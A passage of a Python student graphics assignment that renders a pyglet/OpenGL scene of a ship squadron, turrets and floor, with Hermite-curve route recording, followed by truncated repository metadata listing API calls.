bs.createMinecraftFloor(1.5)\r\n gpuFloor = es.GPUShape().initBuffers()\r\n controller.pipeline.setupVAO(gpuFloor)\r\n gpuFloor.fillBuffers(Floor.vertices,Floor.indices,GL_STATIC_DRAW)\r\n gpuFloor.texture = es.textureSimpleSetup(\r\n getAssetPath(\"floorTexture.png\"), GL_REPEAT, GL_REPEAT, GL_NEAREST, GL_NEAREST)\r\n \r\n Piso = sg.SceneGraphNode('Piso')\r\n Piso.transform = tr.scale(20,20,100)\r\n Piso.childs += [gpuFloor]\r\n\r\n totalFloor = sg.SceneGraphNode('totalFloor')\r\n totalFloor.transform = tr.matmul([tr.translate(0, 0, 0), tr.rotationX(np.deg2rad(90))])\r\n totalFloor.childs += [Piso]\r\n\r\n return totalFloor\r\n\r\n#Con esto ponemos los objetos de la escena (lo quise hacer separado del piso para una futura tarea) \r\ndef createScene() -> sg.SceneGraphNode:\r\n\r\n Cube = bs.createMinecraftCube(1)\r\n gpuCube = es.GPUShape().initBuffers()\r\n controller.pipeline.setupVAO(gpuCube)\r\n gpuCube.fillBuffers(Cube.vertices, Cube.indices, GL_STATIC_DRAW)\r\n gpuCube.texture = es.textureSimpleSetup(\r\n getAssetPath('circuit.jpg'), GL_REPEAT, GL_REPEAT, GL_NEAREST, GL_NEAREST)\r\n \r\n turret = createGPUShape(controller.pipeline, read_OBJ2(getAssetPath(\"Laser_turret.obj\")))\r\n turret.texture = es.textureSimpleSetup(getAssetPath(\"laser_turret_BaseColor.png\"), \r\n GL_REPEAT, GL_REPEAT, GL_NEAREST, GL_NEAREST)\r\n glGenerateMipmap(GL_TEXTURE_2D)\r\n\r\n Torreta = sg.SceneGraphNode('Torreta')\r\n Torreta.transform = tr.uniformScale(1)\r\n Torreta.childs += [turret]\r\n\r\n Torreta1 = sg.SceneGraphNode('Torreta1')\r\n Torreta1.transform = tr.translate(0, 0, -9)\r\n Torreta1.childs += [Torreta]\r\n\r\n Torreta2 = sg.SceneGraphNode('Torreta2')\r\n Torreta2.transform = tr.translate(-5,0, 5)\r\n Torreta2.childs += [Torreta]\r\n\r\n Torreta3 = sg.SceneGraphNode('Torreta3')\r\n Torreta3.transform = tr.translate(8,0,8)\r\n Torreta3.childs += [Torreta]\r\n \r\n Condensador = sg.SceneGraphNode('condensador')\r\n Condensador.transform = 
tr.uniformScale(0.8)\r\n Condensador.childs += [gpuCube]\r\n\r\n Condensador1 = sg.SceneGraphNode('condesador1')\r\n Condensador1.transform = tr.matmul([tr.translate(-4, 1, 3), tr.scale(1,5,1)])\r\n Condensador1.childs += [Condensador]\r\n\r\n Condensador2 = sg.SceneGraphNode('condesador2')\r\n Condensador2.transform = tr.matmul([tr.translate(4, 1, -3), tr.scale(7,2,1)])\r\n Condensador2.childs += [Condensador]\r\n\r\n scene = sg.SceneGraphNode('scene')\r\n scene.childs += [Condensador1]\r\n scene.childs += [Condensador2]\r\n scene.childs += [Torreta1]\r\n scene.childs += [Torreta2]\r\n scene.childs += [Torreta3]\r\n\r\n return scene\r\n\r\n#con esta funcion vamos moviendo el escuadron, segun la propiedades que le pusimos a la nave \r\ndef add_points(position, orientation):\r\n controller.check_points_tograph.append(Point((position[0],position[1],position[2])))\r\n controller.check_points.append([position[0],position[1],position[2],orientation])\r\n\r\n@controller.event\r\ndef on_key_press(symbol, modifiers):\r\n global vector\r\n if symbol == pyglet.window.key.P: #Esto nos permite cambiar a una vista en perspectiva\r\n camera.set_projection(PERSPECTIVE_PROJECTION)\r\n if symbol == pyglet.window.key.O: #Esto nos permite cambiar a una vista ortografica\r\n camera.set_projection(ORTOGRAPHIC_PROJECTION)\r\n if symbol == pyglet.window.key.W: #avanzar\r\n ship.velocity = -0.3\r\n if symbol == pyglet.window.key.S: #retroceder\r\n ship.velocity = 0.1\r\n if symbol == pyglet.window.key.A: #rotar antihorario\r\n ship.rotationylocal = 0.1\r\n if symbol == pyglet.window.key.D: #rotar horario\r\n ship.rotationylocal = -0.1 \r\n if symbol == pyglet.window.key.R: #Aqui se graban puntos y ademas se crean las matrices y la curva final de hermite\r\n Yrotation = sg.findTransform(escuadron, 'Escuadron')\r\n add_points([ship.x,ship.y,ship.z],[Yrotation[0][0],Yrotation[0][2],Yrotation[2][0],Yrotation[2][2]])\r\n controller.curve = []\r\n if len(controller.check_points) == 0:\r\n pass\r\n if len(controller.check_points) == 1:\r\n pass\r\n else:\r\n for i in range(1, len(controller.check_points)):\r\n P1 = np.array([[controller.check_points[i-1][0],\r\n controller.check_points[i-1][1], \r\n controller.check_points[i-1][2]]]).T \r\n P2 = np.array([[controller.check_points[i][0],\r\n controller.check_points[i][1],\r\n controller.check_points[i][2]]]).T \r\n T1 = np.array([[30, 0,30]]).T\r\n T2 = np.array([[30, 0,30]]).T# #la idea es crear una matriz de hermite para los puntos de control\r\n matrix = cs.hermiteMatrix(P1, P2, T1, T2)\r\n controller.curve.append(cs.evalCurve(matrix, N))\r\n if len(controller.curve) == 0:\r\n pass\r\n if len(controller.curve) == 1:\r\n ship.route = controller.curve[0]\r\n else:\r\n ship.route = controller.curve[0]\r\n for j in range(1, len(controller.curve)): #luego aqui abajo quiero concatenar la lista para crear una sola curva final\r\n ship.route = np.concatenate((ship.route, controller.curve[j])) \r\n controller.step = 0\r\n if symbol == pyglet.window.key.L: #Nos hace comenzar a recorrer la ruta (debe mantenerse apretado L)\r\n if len(controller.curve) == 0: #Esto es para asegurarnos de que almenos haya una curva, la cantidad de curvas siempre sera un numero natural.\r\n pass\r\n else:\r\n ship.start_route = True #este booleano le indica a update que debe cambiar la transformacion de la nave\r\n if symbol == pyglet.window.key.V: #Nos permite visualizar la ruta (debe mantenerse apretado V)\r\n controller.show_route = True\r\n if symbol == pyglet.window.key.ESCAPE:\r\n 
controller.close()\r\n\r\n@controller.event\r\ndef on_key_release(symbol, modifiers):\r\n if symbol == pyglet.window.key.W:\r\n ship.velocity = 0\r\n if symbol == pyglet.window.key.S:\r\n ship.velocity = 0\r\n if symbol == pyglet.window.key.A:\r\n ship.rotationylocal = 0\r\n if symbol == pyglet.window.key.D:\r\n ship.rotationylocal = 0\r\n if symbol == pyglet.window.key.Q: \r\n ship.rotationzlocal = 0\r\n if symbol == pyglet.window.key.E:\r\n ship.rotationzlocal = 0\r\n if symbol == pyglet.window.key.L:\r\n ship.start_route = False\r\n if symbol == pyglet.window.key.V:\r\n controller.show_route = False\r\n\r\n@controller.event\r\ndef on_mouse_drag(x,y,dx,dy, buttons, modifiers):\r\n if buttons == pyglet.window.mouse.LEFT: #pense que al apretar el left click y luego permitir que la nave se moviera\r\n if y > 460: #era mas natural que se moviera siempre\r\n ship.altitude = 20*dy/960\r\n if y == 0:\r\n ship.altitude = 0\r\n elif y < 0:\r\n ship.altitude = -10*dy/960\r\n\r\nescuadron = crearEscuadron()\r\nsombras = crearSombra()\r\npiso = createFloor()\r\nescenario = createScene()\r\npunto = createGPUShape(controller.pipeline2, bs.createAxis(0.0001))\r\n\r\ndef update(dt):\r\n global vector\r\n escuadron.transform = tr.matmul([escuadron.transform, tr.rotationY(ship.rotationylocal), tr.translate(0, ship.altitude, ship.velocity)]) #esta se encarga de rotar mi nave sobre su eje y, ademas de trasladarla\r\n ship.x = sg.findPosition(escuadron,'Escuadron')[0][0] #actualizamos los parametros de la posicion de la nave\r\n ship.y = sg.findPosition(escuadron, 'Escuadron')[1][0]\r\n ship.z = sg.findPosition(escuadron, 'Escuadron')[2][0]\r\n sombras.transform = tr.matmul([sombras.transform, tr.rotationY(ship.rotationylocal), tr.translate(0, 0, ship.velocity)])\r\n camera.eye[1] = ship.y+7\r\n camera.at[1] = ship.y\r\n camera.eye[0] = ship.x+5 \r\n camera.at[0] = ship.x\r\n camera.eye[2] = ship.z+5 \r\n camera.at[2] = ship.z\r\n\r\n if controller.step == (N*len(controller.curve))-1:\r\n pass\r\n else:\r\n controller.step += 1\r\n\r\n if controller.step >= 1 and len(ship.route) >=1: \r\n vector = [ship.route[controller.step][0]-ship.route[controller.step-1][0], #este es un vector que toma tiene como coordernadas xf-xi para cada instante,\r\n ship.route[controller.step][1]-ship.route[controller.step-1][1], #esto permite darle orientacion a la nave mientras recorre\r\n ship.route[controller.step][2]-ship.route[controller.step-1][2]]\r\n angle=pi+atan2(vector[0],vector[2]) #aca sacamos la arcotangente, en un principio queda dado vuelta pero para esto se le suma pi\r\n \r\n if ship.start_route:\r\n transformEscuadron = tr.matmul([ #Este transform permite a la nave recorrer la curva de hermite\r\n tr.translate(ship.route[controller.step, 0],\r\n ship.route[controller.step, 1],\r\n ship.route[controller.step, 2]), tr.rotationY(angle)])\r\n escuadron.transform = transformEscuadron\r\n sombras.transform = transformEscuadron\r\n ship.linex = ship.route[controller.step][0]\r\n ship.liney = ship.route[controller.step][1]\r\n ship.linez = ship.route[controller.step][2]\r\n\r\n@controller.event\r\ndef on_draw():\r\n controller.clear()\r\n\r\n glClearColor(1.0, 1.0, 1.0, 0.8)\r\n\r\n view = tr.lookAt(\r\n camera.eye,\r\n camera.at,\r\n camera.up\r\n )\r\n\r\n for points in controller.check_points_tograph: #Aca dibujamos los puntos de control\r\n transform = tr.matmul([\r\n tr.translate(points.position[0],points.position[1],points.position[2]), \r\n tr.uniformScale(0.25)]\r\n )\r\n 
glUseProgram(controller.pipeline2.shaderProgram)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline2.shaderProgram, \"projection\"), 1, GL_TRUE, camera.projection)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline2.shaderProgram, \"view\"), 1, GL_TRUE, view)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline2.shaderProgram, \"model\"), 1, GL_TRUE, transform)\r\n controller.pipeline2.drawCall(points.ex_shape)\r\n\r\n \r\n glUseProgram(controller.pipeline2.shaderProgram)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline2.shaderProgram, \"model\"), 1, GL_TRUE, tr.identity())\r\n controller.pipeline2.drawCall(punto)\r\n\r\n if controller.show_route and len(controller.curve)>=1: #basados en cloth.py aqui dibujamos las lineas de la ruta\r\n lines = pipeline.vertex_list( #creamos una lista de vertices\r\n len(ship.route),\r\n pyglet.gl.GL_LINES,position=\"f\",)\r\n tupla = ()\r\n for i in range(0, len(ship.route)): #Aqui creamos la posicion de los vertices en base a nuestra curva\r\n tupla += (ship.route[i][0], ship.route[i][1], ship.route[i][2])\r\n lines.position[:] = tupla #asignamos las tuplas creadas como la posicion\r\n lines.draw(pyglet.gl.GL_LINES) \r\n\r\n glUseProgram(controller.pipeline.shaderProgram)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline.shaderProgram, \"projection\"), 1, GL_TRUE, camera.projection)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline.shaderProgram, \"view\"), 1, GL_TRUE, view)\r\n glUniform3f(glGetUniformLocation(controller.pipeline.shaderProgram, \"viewPosition\"), camera.at[0], camera.at[1], camera.at[2])\r\n glEnable(GL_DEPTH_TEST)\r\n sg.drawSceneGraphNode(escenario, controller.pipeline, \"model\")\r\n sg.drawSceneGraphNode(piso, controller.pipeline, \"model\")\r\n sg.drawSceneGraphNode(sombras, controller.pipeline, \"model\")\r\n sg.drawSceneGraphNode(escuadron, controller.pipeline, \"model\")\r\n\r\nif __name__ == \"__main__\":\r\n pyglet.clock.schedule_interval(update, 1/60)\r\n pyglet.app.run()", "repo_name": "Adolphsus/CC3501", "sub_path": "Tarea3/tarea3.py", "file_name": "tarea3.py", "file_ext": "py", "file_size_in_byte": 17400, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "pyglet.window", "line_number": 30, "usage_type": "attribute"}, {"api_name": "libs.easy_shaders.SimpleTextureModelViewProjectionShaderProgram", "line_number": 34, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 34, "usage_type": "name"}, {"api_name": "libs.easy_shaders.SimpleModelViewProjectionShaderProgram", "line_number": 35, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 35, "usage_type": "name"}, {"api_name": "libs.transformations.ortho", "line_number": 50, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 50, "usage_type": "name"}, {"api_name": "libs.transformations.perspective", "line_number": 51, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 51, "usage_type": "name"}, 
{"api_name": "pathlib.Path", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 53, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 56, "usage_type": "name"}, {"api_name": "pyglet.graphics.shader.Shader", "line_number": 59, "usage_type": "call"}, {"api_name": "pyglet.graphics.shader.Shader", "line_number": 60, "usage_type": "call"}, {"api_name": "pyglet.graphics.shader.ShaderProgram", "line_number": 61, "usage_type": "call"}, {"api_name": "ship.createShip", "line_number": 67, "usage_type": "call"}, {"api_name": "ship.createsombra", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 85, "usage_type": "call"}, {"api_name": "ship.x", "line_number": 85, "usage_type": "attribute"}, {"api_name": "ship.y", "line_number": 85, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "libs.gpu_shape.createGPUShape", "line_number": 106, "usage_type": "call"}, {"api_name": "libs.basic_shapes.createColorCube", "line_number": 106, "usage_type": "call"}, {"api_name": "libs.basic_shapes", "line_number": 106, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 107, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 112, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 112, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 113, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 113, "usage_type": "name"}, {"api_name": "libs.transformations.rotationY", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 113, "usage_type": "call"}, {"api_name": "libs.transformations.uniformScale", "line_number": 113, "usage_type": "call"}, {"api_name": "ship.shape", "line_number": 114, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 116, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 116, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 117, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 117, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 120, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 120, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 121, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 121, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 124, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 124, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 125, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 125, "usage_type": "name"}, {"api_name": 
"libs.scene_graph.SceneGraphNode", "line_number": 133, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 133, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 134, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 134, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 134, "usage_type": "call"}, {"api_name": "libs.transformations.scale", "line_number": 134, "usage_type": "call"}, {"api_name": "libs.transformations.rotationY", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 134, "usage_type": "call"}, {"api_name": "ship.shapesombra", "line_number": 135, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 137, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 137, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 138, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 138, "usage_type": "name"}, {"api_name": "ship.x", "line_number": 138, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 138, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 141, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 141, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 142, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 142, "usage_type": "name"}, {"api_name": "ship.x", "line_number": 142, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 142, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 145, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 145, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 146, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 146, "usage_type": "name"}, {"api_name": "ship.x", "line_number": 146, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 146, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 149, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 149, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 150, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 150, "usage_type": "name"}, {"api_name": "libs.basic_shapes.createMinecraftFloor", "line_number": 160, "usage_type": "call"}, {"api_name": "libs.basic_shapes", "line_number": 160, "usage_type": "name"}, {"api_name": "libs.easy_shaders.GPUShape", "line_number": 161, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 161, "usage_type": "name"}, {"api_name": "libs.easy_shaders.textureSimpleSetup", "line_number": 164, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 164, "usage_type": "name"}, {"api_name": "libs.assets_path.getAssetPath", "line_number": 165, "usage_type": "call"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 167, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 167, "usage_type": "name"}, {"api_name": "libs.transformations.scale", "line_number": 168, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 168, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 171, "usage_type": "call"}, {"api_name": 
"libs.scene_graph", "line_number": 171, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 172, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 172, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 172, "usage_type": "call"}, {"api_name": "libs.transformations.rotationX", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 172, "usage_type": "call"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 158, "usage_type": "attribute"}, {"api_name": "libs.scene_graph", "line_number": 158, "usage_type": "name"}, {"api_name": "libs.basic_shapes.createMinecraftCube", "line_number": 180, "usage_type": "call"}, {"api_name": "libs.basic_shapes", "line_number": 180, "usage_type": "name"}, {"api_name": "libs.easy_shaders.GPUShape", "line_number": 181, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 181, "usage_type": "name"}, {"api_name": "libs.easy_shaders.textureSimpleSetup", "line_number": 184, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 184, "usage_type": "name"}, {"api_name": "libs.assets_path.getAssetPath", "line_number": 185, "usage_type": "call"}, {"api_name": "libs.gpu_shape.createGPUShape", "line_number": 187, "usage_type": "call"}, {"api_name": "libs.obj_handler.read_OBJ2", "line_number": 187, "usage_type": "call"}, {"api_name": "libs.assets_path.getAssetPath", "line_number": 187, "usage_type": "call"}, {"api_name": "libs.easy_shaders.textureSimpleSetup", "line_number": 188, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 188, "usage_type": "name"}, {"api_name": "libs.assets_path.getAssetPath", "line_number": 188, "usage_type": "call"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 192, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 192, "usage_type": "name"}, {"api_name": "libs.transformations.uniformScale", "line_number": 193, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 193, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 196, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 196, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 197, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 197, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 200, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 200, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 201, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 201, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 204, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 204, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 205, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 205, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 208, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 208, "usage_type": "name"}, {"api_name": "libs.transformations.uniformScale", "line_number": 209, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 209, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 212, "usage_type": 
"call"}, {"api_name": "libs.scene_graph", "line_number": 212, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 213, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 213, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 213, "usage_type": "call"}, {"api_name": "libs.transformations.scale", "line_number": 213, "usage_type": "call"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 216, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 216, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 217, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 217, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 217, "usage_type": "call"}, {"api_name": "libs.transformations.scale", "line_number": 217, "usage_type": "call"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 220, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 220, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 178, "usage_type": "attribute"}, {"api_name": "libs.scene_graph", "line_number": 178, "usage_type": "name"}, {"api_name": "pyglet.window", "line_number": 237, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 239, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 241, "usage_type": "attribute"}, {"api_name": "ship.velocity", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 243, "usage_type": "attribute"}, {"api_name": "ship.velocity", "line_number": 244, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 245, "usage_type": "attribute"}, {"api_name": "ship.rotationylocal", "line_number": 246, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 247, "usage_type": "attribute"}, {"api_name": "ship.rotationylocal", "line_number": 248, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 249, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.findTransform", "line_number": 250, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 250, "usage_type": "name"}, {"api_name": "ship.x", "line_number": 251, "usage_type": "attribute"}, {"api_name": "ship.y", "line_number": 251, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 251, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 266, "usage_type": "call"}, {"api_name": "libs.curves.hermiteMatrix", "line_number": 267, "usage_type": "call"}, {"api_name": "libs.curves", "line_number": 267, "usage_type": "name"}, {"api_name": "libs.curves.evalCurve", "line_number": 268, "usage_type": "call"}, {"api_name": "libs.curves", "line_number": 268, "usage_type": "name"}, {"api_name": "ship.route", "line_number": 272, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 274, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 276, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 276, "usage_type": "call"}, {"api_name": "pyglet.window", "line_number": 278, "usage_type": "attribute"}, {"api_name": "ship.start_route", "line_number": 282, 
"usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 283, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 285, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 290, "usage_type": "attribute"}, {"api_name": "ship.velocity", "line_number": 291, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 292, "usage_type": "attribute"}, {"api_name": "ship.velocity", "line_number": 293, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 294, "usage_type": "attribute"}, {"api_name": "ship.rotationylocal", "line_number": 295, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 296, "usage_type": "attribute"}, {"api_name": "ship.rotationylocal", "line_number": 297, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 298, "usage_type": "attribute"}, {"api_name": "ship.rotationzlocal", "line_number": 299, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 300, "usage_type": "attribute"}, {"api_name": "ship.rotationzlocal", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 302, "usage_type": "attribute"}, {"api_name": "ship.start_route", "line_number": 303, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 304, "usage_type": "attribute"}, {"api_name": "pyglet.window", "line_number": 309, "usage_type": "attribute"}, {"api_name": "ship.altitude", "line_number": 311, "usage_type": "attribute"}, {"api_name": "ship.altitude", "line_number": 313, "usage_type": "attribute"}, {"api_name": "ship.altitude", "line_number": 315, "usage_type": "attribute"}, {"api_name": "libs.gpu_shape.createGPUShape", "line_number": 321, "usage_type": "call"}, {"api_name": "libs.basic_shapes.createAxis", "line_number": 321, "usage_type": "call"}, {"api_name": "libs.basic_shapes", "line_number": 321, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 325, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 325, "usage_type": "name"}, {"api_name": "libs.transformations.rotationY", "line_number": 325, "usage_type": "call"}, {"api_name": "ship.rotationylocal", "line_number": 325, "usage_type": "attribute"}, {"api_name": "libs.transformations.translate", "line_number": 325, "usage_type": "call"}, {"api_name": "ship.altitude", "line_number": 325, "usage_type": "attribute"}, {"api_name": "ship.velocity", "line_number": 325, "usage_type": "attribute"}, {"api_name": "ship.x", "line_number": 326, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.findPosition", "line_number": 326, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 326, "usage_type": "name"}, {"api_name": "ship.y", "line_number": 327, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.findPosition", "line_number": 327, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 327, "usage_type": "name"}, {"api_name": "ship.z", "line_number": 328, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.findPosition", "line_number": 328, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 328, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 329, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 329, "usage_type": "name"}, {"api_name": "libs.transformations.rotationY", "line_number": 329, "usage_type": "call"}, {"api_name": "ship.rotationylocal", "line_number": 329, 
"usage_type": "attribute"}, {"api_name": "libs.transformations.translate", "line_number": 329, "usage_type": "call"}, {"api_name": "ship.velocity", "line_number": 329, "usage_type": "attribute"}, {"api_name": "ship.y", "line_number": 330, "usage_type": "attribute"}, {"api_name": "ship.y", "line_number": 331, "usage_type": "attribute"}, {"api_name": "ship.x", "line_number": 332, "usage_type": "attribute"}, {"api_name": "ship.x", "line_number": 333, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 334, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 335, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 342, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 343, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 344, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 345, "usage_type": "attribute"}, {"api_name": "ship.start_route", "line_number": 348, "usage_type": "attribute"}, {"api_name": "libs.transformations.matmul", "line_number": 349, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 349, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 350, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 